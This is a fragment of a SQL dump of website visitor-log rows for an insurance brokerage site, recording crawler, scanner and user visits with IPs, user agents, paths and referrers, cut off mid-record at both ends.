bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(13602,'0b_35a1cee99f50b448d3a79287cb79cc15','1459896967','208.115.111.66','208-115-111-66-reverse.wowrack.com','/meet-the-eib-team/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(13605,'0b_ad0e73bcc1db0e4d77f616ffac77400a','1459897235','178.255.215.70','crawl06.exabot.com','/robots.txt','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','3','0',0),(13608,'0b_ad0e73bcc1db0e4d77f616ffac77400a','1459897244','178.255.215.70','crawl06.exabot.com','/?page_id=169','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','3','0',0),(13610,'0b_ad0e73bcc1db0e4d77f616ffac77400a','1459897245','178.255.215.70','crawl06.exabot.com','/register/','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','3','0',0),(13611,'0b_ad0e73bcc1db0e4d77f616ffac77400a','1459897257','178.255.215.70','crawl06.exabot.com','/feed/','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','3','0',0),(13614,'0b_ad0e73bcc1db0e4d77f616ffac77400a','1459897260','178.255.215.70','crawl06.exabot.com','/comments/feed/','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','3','0',0),(13617,'0b_ad0e73bcc1db0e4d77f616ffac77400a','1459897263','178.255.215.70','crawl06.exabot.com','/register/feed/','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','3','0',0),(13620,'0b_ad0e73bcc1db0e4d77f616ffac77400a','1459897279','178.255.215.70','crawl06.exabot.com','/?p=169','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','3','0',0),(13623,'0b_81f405c2d98bf14dbe15c5f664f25b6c','1459897815','117.120.18.131,210.10.200.86','210-10-200-86.syd.static-ipl.aapt.com.au','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.bing.com/search?q=empire+insurance+brokers&src=IE-SearchBox&FORM=IENTSR','empire insurance brokers',1,'Win7','IE 11','au','','Bing','','','','','0','0',0),(13625,'0b_81f405c2d98bf14dbe15c5f664f25b6c','1459897819','117.120.18.131,210.10.200.86','210-10-200-86.syd.static-ipl.aapt.com.au','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7','IE 11','au','','','','','','','0','0',0),(13626,'0b_81f405c2d98bf14dbe15c5f664f25b6c','1459898111','117.120.18.131,210.10.200.86','210-10-200-86.syd.static-ipl.aapt.com.au','/about-us/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7','IE 11','au','1920 x 1200','','','','','','0','0',0),(13629,'0b_81f405c2d98bf14dbe15c5f664f25b6c','1459898338','210.10.200.86','210-10-200-86.syd.static-ipl.aapt.com.au','/contact/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/about-us/','',0,'Win7','IE 11','au','1920 x 1200','','','','','','0','51',0),(13631,'0b_f5ac762f423d3fca090eb11feef64ca7','1459901559','157.55.39.63','msnbot-157-55-39-63.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(13634,'0b_e6d364a0cf8fe18f03b826af97de894e','1459902464','207.91.191.77','207-91-191-77.nstci.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjkwq664PjLAhXmnYMKHUcuB7MQFggcMAA&url=http%3A%2F%2Fwww.empireins.com%2F&usg=AFQjCNEqpoINuZ9iLoJwjv1SXIp20w_BCg&bvm=bv.118443451,d.amc','',0,'Win7 x64','IE 11','us','1416 x 796','','','','','','0','0',0),(13637,'0b_e6d364a0cf8fe18f03b826af97de894e','1459902466','207.91.191.77','207-91-191-77.nstci.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1416 x 796','','','','','','0','0',0),(13638,'0b_e6d364a0cf8fe18f03b826af97de894e','1459902487','207.91.191.77','207-91-191-77.nstci.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1416 x 796','','','','','','0','0',0),(13640,'0b_e6d364a0cf8fe18f03b826af97de894e','1459902488','207.91.191.77','207-91-191-77.nstci.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1416 x 796','','','','','','0','0',0),(13641,'0b_2cb91bfecfcb0a96e1c0eeef4cfa5d6d','1459905840','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(13644,'0b_0bfbe9384de5124baa74016897bc007d','1459906685','65.123.142.184','65.123.142.184','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.149 Safari/537.36','','',0,'Win7','Chrome 33','','','','','','','','0','0',0),(13646,'0b_c12297718fa43b960c2320e4ca05eff8','1459908422','40.77.167.98','msnbot-40-77-167-98.search.msn.com','/main.html','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(13647,'0b_7d1e9e5b416356d8a173f1cae29b01b4','1459909274','192.227.248.204','192-227-248-204-host.colocrossing.com','/contact/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5','http://www.empireins.com/','',0,'MacOSX','Safari 8','us','','','','','','','0','0',0),(13649,'0b_489361768e7722e214954d670aebfa17','1459909862','206.123.95.138','206-123-95-138-host.colocrossing.com','/contact/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36','http://www.empireins.com/','',0,'MacOSX','Chrome 39','us','','','','','','','0','0',0),(13650,'0b_408edcbcf61f0ffe59198661753f6fdf','1459911393','208.115.111.66','208-115-111-66-reverse.wowrack.com','/carriers/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(13652,'0b_827b8ae85acba4057e880b4db0b843f7','1459912284','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(13653,'0b_a139a6d260ba7bdc1a367ce26829b4f7','1459913877','64.246.165.170','www.whois.sc','/robots.txt','Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)','','',0,'WinXP','Firefox 3','sc','','','SurveyBot','','','','0','0',0),(13655,'0b_a139a6d260ba7bdc1a367ce26829b4f7','1459913879','64.246.165.170','www.whois.sc','/','Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)','http://whois.domaintools.com/empireins.com','',0,'WinXP','Firefox 3','sc','','','SurveyBot','','','','0','0',0),(13658,'0b_adbc0d4f7bbc56a35939ab941a3f69fe','1459914136','40.77.167.98','msnbot-40-77-167-98.search.msn.com','/igo','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(13659,'0b_adbc0d4f7bbc56a35939ab941a3f69fe','1459914141','40.77.167.98','msnbot-40-77-167-98.search.msn.com','/igo/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(13661,'0b_14bd1e57fe10af854dc2034b4a096499','1459914740','66.249.73.202','crawl-66-249-73-202.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(13662,'0b_a7d10d6e252f1457d40f55a28cdf4dca','1459914749','66.249.73.194','crawl-66-249-73-194.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(13664,'0b_a7d10d6e252f1457d40f55a28cdf4dca','1459914750','66.249.73.169','crawl-66-249-73-169.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(13667,'0b_a7d10d6e252f1457d40f55a28cdf4dca','1459914752','66.249.73.178','crawl-66-249-73-178.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(13670,'0b_ef5ce2ec5714cec1f9ed1b2835775a6f','1459922835','45.79.89.188','li1188-188.members.linode.com','/','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(13673,'0b_538b5d6fd7db2e5cc4e3a136ddd88689','1459924013','66.249.73.194','crawl-66-249-73-194.googlebot.com','/SSO/235_38.html','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(13676,'0b_1350b913a7cdf3fb2bf61df4738c2977','1459924729','40.77.167.40','msnbot-40-77-167-40.search.msn.com','/carriers/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(13679,'0b_82fb47127b650719ab9d8b85f44a787f','1459925460','157.55.39.113','msnbot-157-55-39-113.search.msn.com','/under.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(13680,'0b_789d84676eea2b89a3704898a6dd6e03','1459928076','52.73.200.208','ec2-52-73-200-208.compute-1.amazonaws.com','/','Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.','','',0,'iPhone OS','Safari 4 Mobile','us','','','','','','','0','0',0),(13683,'0b_f336f7a58d4d137b91ab5191187cc7a1','1459932182','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(13686,'0b_be8e27dca70616ba115c2d2c87fcf621','1459932387','213.111.196.45','45.196-pool.nikopol.net','/?author=1','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36','http://EMPIREINS.COM/?author=1','',0,'Win7','Chrome 31','ru','','','','','','','0','0',0),(13688,'0b_f640ef6230476fd6af298bd9cc58474e','1459932484','66.249.73.178','crawl-66-249-73-178.googlebot.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(13691,'0b_5c6044d3dba3510962080b5ea1742de4','1459942547','5.9.28.226','static.226.28.9.5.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','3','0',0),(13692,'0b_5c6044d3dba3510962080b5ea1742de4','1459942554','5.9.28.226','static.226.28.9.5.clients.your-server.de','/?page_id=169','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','3','0',0),(13695,'0b_5c6044d3dba3510962080b5ea1742de4','1459942560','5.9.28.226','static.226.28.9.5.clients.your-server.de','/register/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','3','0',0),(13697,'0b_5c6044d3dba3510962080b5ea1742de4','1459942565','5.9.28.226','static.226.28.9.5.clients.your-server.de','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','3','0',0),(13700,'0b_5c6044d3dba3510962080b5ea1742de4','1459942570','5.9.28.226','static.226.28.9.5.clients.your-server.de','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','3','0',0),(13701,'0b_5c6044d3dba3510962080b5ea1742de4','1459942574','5.9.28.226','static.226.28.9.5.clients.your-server.de','/meet-the-eib-team/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','3','0',0),(13703,'0b_226465282c9aae009619bcadeac97218','1459944250','157.55.39.63','msnbot-157-55-39-63.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(13706,'0b_d322386049f04af71deffc685f330029','1459946259','40.77.167.40','msnbot-40-77-167-40.search.msn.com','/licensing-contracting/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(13707,'0b_63eb36c19eb243c87eeb9ef6e5cf8727','1459948132','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(13709,'0b_63eb36c19eb243c87eeb9ef6e5cf8727','1459948134','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(13712,'0b_63eb36c19eb243c87eeb9ef6e5cf8727','1459948134','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(13715,'0b_63eb36c19eb243c87eeb9ef6e5cf8727','1459948689','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(13716,'0b_8263568fe72e31e847d870b1dac70ee9','1459949508','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(13719,'0b_8263568fe72e31e847d870b1dac70ee9','1459949509','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(13721,'0b_be40034cc428170451f3009ccb0909cd','1459950010','178.255.215.70','crawl06.exabot.com','/SSO/235_38.html','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(13722,'0b_be40034cc428170451f3009ccb0909cd','1459950012','178.255.215.70','crawl06.exabot.com','/SSO/235_18.html','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(13725,'0b_be40034cc428170451f3009ccb0909cd','1459950015','178.255.215.70','crawl06.exabot.com','/SSO/235_11.html','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(13728,'0b_be40034cc428170451f3009ccb0909cd','1459950017','178.255.215.70','crawl06.exabot.com','/SSO/235_42.html','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(13731,'0b_71d3df8492b54159e63f1a5b0b5ce690','1459951305','70.90.46.97','70-90-46-97-michigan.hfc.comcastbusiness.net','/','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.134 Safari/534.16','','',0,'WinXP','Chrome 10','us','','','','','','','0','0',0),(13733,'0b_ca10321d1b010edd48aa5fe7ab4b212f','1459951307','70.90.46.97','70-90-46-97-michigan.hfc.comcastbusiness.net','/','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.43 Safari/534.24','','',0,'WinXP','Chrome 11','us','','','','','','','0','0',0),(13734,'0b_24b89d93428b65b88f3b1a4c95472b13','1459953074','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(13736,'0b_24b89d93428b65b88f3b1a4c95472b13','1459953076','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(13739,'0b_994a720915339b16ff53e3808ff1626a','1459953414','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(13740,'0b_9b0ce41504cd9219d7acdcd8fcc07279','1459953429','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','0',0),(13742,'0b_9b0ce41504cd9219d7acdcd8fcc07279','1459953440','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(13745,'0b_9b0ce41504cd9219d7acdcd8fcc07279','1459953470','75.99.37.250','ool-4b6325fa.static.optonline.net','/carrier-field-underwriting-guides/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(13748,'0b_69c8b19d3e51637aa04e05ef951ad188','1459954529','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(13749,'0b_69c8b19d3e51637aa04e05ef951ad188','1459954531','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(13751,'0b_66e2edf0d7c86840712b0e1bab198981','1459955302','67.212.162.98','scan03.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(13754,'0b_66e2edf0d7c86840712b0e1bab198981','1459955306','67.212.162.98','scan03.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(13755,'0b_66e2edf0d7c86840712b0e1bab198981','1459955308','67.212.162.98','scan03.sitelock.com','/licensing-contracting/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(13758,'0b_66e2edf0d7c86840712b0e1bab198981','1459955310','67.212.162.98','scan03.sitelock.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(13761,'0b_66e2edf0d7c86840712b0e1bab198981','1459955316','67.212.162.98','scan03.sitelock.com','/insentives/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(13763,'0b_66e2edf0d7c86840712b0e1bab198981','1459955318','67.212.162.98','scan03.sitelock.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(13766,'0b_66e2edf0d7c86840712b0e1bab198981','1459955321','67.212.162.98','scan03.sitelock.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(13769,'0b_d0d5e6f75d618cf1b0bdd76eb4a08b26','1459955456','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(13772,'0b_a1eefe435fcc470d3e77e132bad60d31','1459955631','40.77.167.40','msnbot-40-77-167-40.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(13773,'0b_ef849241cf3a11f34f6e57df968e08b3','1459955950','24.146.252.22','ool-1892fc16.dyn.optonline.net','/?page_id=171','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)','','',0,'Win7 x64','IE 10','us','','','','','','','3','0',0),(13776,'0b_ef849241cf3a11f34f6e57df968e08b3','1459955952','24.146.252.22','ool-1892fc16.dyn.optonline.net','/members/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)','','',0,'Win7 x64','IE 10','us','','','','','','','3','0',0),(13778,'0b_d23d00c0c993bbb82a4100d04ee125b1','1459956018','24.146.252.22','ool-1892fc16.dyn.optonline.net','/members/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)','http://www.empireins.com/members/','',0,'Win7 x64','IE 10','us','1344 x 840','','','','hglanzer','','0','0',0),(13781,'0b_d23d00c0c993bbb82a4100d04ee125b1','1459956026','24.146.252.22','ool-1892fc16.dyn.optonline.net','/members/?a=pwdchange','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)','http://www.empireins.com/members/','',0,'Win7 x64','IE 10','us','1344 x 840','','','','hglanzer','','0','51',0),(13784,'0b_d23d00c0c993bbb82a4100d04ee125b1','1459956046','24.146.252.22','ool-1892fc16.dyn.optonline.net','/members/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)','http://www.empireins.com/members/?a=pwdchange','',0,'Win7 x64','IE 10','us','1344 x 840','','','','hglanzer','','0','51',0),(13785,'0b_d23d00c0c993bbb82a4100d04ee125b1','1459956073','24.146.252.22','ool-1892fc16.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)','http://www.empireins.com/members/','',0,'Win7 x64','IE 10','us','1344 x 840','','','','hglanzer','','0','51',0),(13788,'0b_8605b5695a81ab2e84e5dc5d9aea777f','1459956172','66.87.116.84','66-87-116-84.pools.spcsdns.net','/','Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1','','',0,'iPhone OS','Safari 9 Mobile','us','320 x 568','','','','','','0','0',0),(13790,'0b_8605b5695a81ab2e84e5dc5d9aea777f','1459956174','66.87.116.84','66-87-116-84.pools.spcsdns.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1','','',0,'iPhone OS','Safari 9 Mobile','us','320 x 568','','','','','','0','0',0),(13791,'0b_8605b5695a81ab2e84e5dc5d9aea777f','1459956188','66.87.116.84','66-87-116-84.pools.spcsdns.net','/term-quotes/','Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1','http://www.empireins.com/','',0,'iPhone OS','Safari 9 Mobile','us','320 x 568','','','','','','0','51',0),(13793,'0b_cb97e34fc1ab3638243be649a66a2a43','1459956321','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(13796,'0b_cb97e34fc1ab3638243be649a66a2a43','1459956322','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(13797,'0b_cb97e34fc1ab3638243be649a66a2a43','1459956327','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(13799,'0b_cb97e34fc1ab3638243be649a66a2a43','1459956332','108.58.88.178','ool-6c3a58b2.static.optonline.net','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(13800,'0b_cb97e34fc1ab3638243be649a66a2a43','1459956336','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 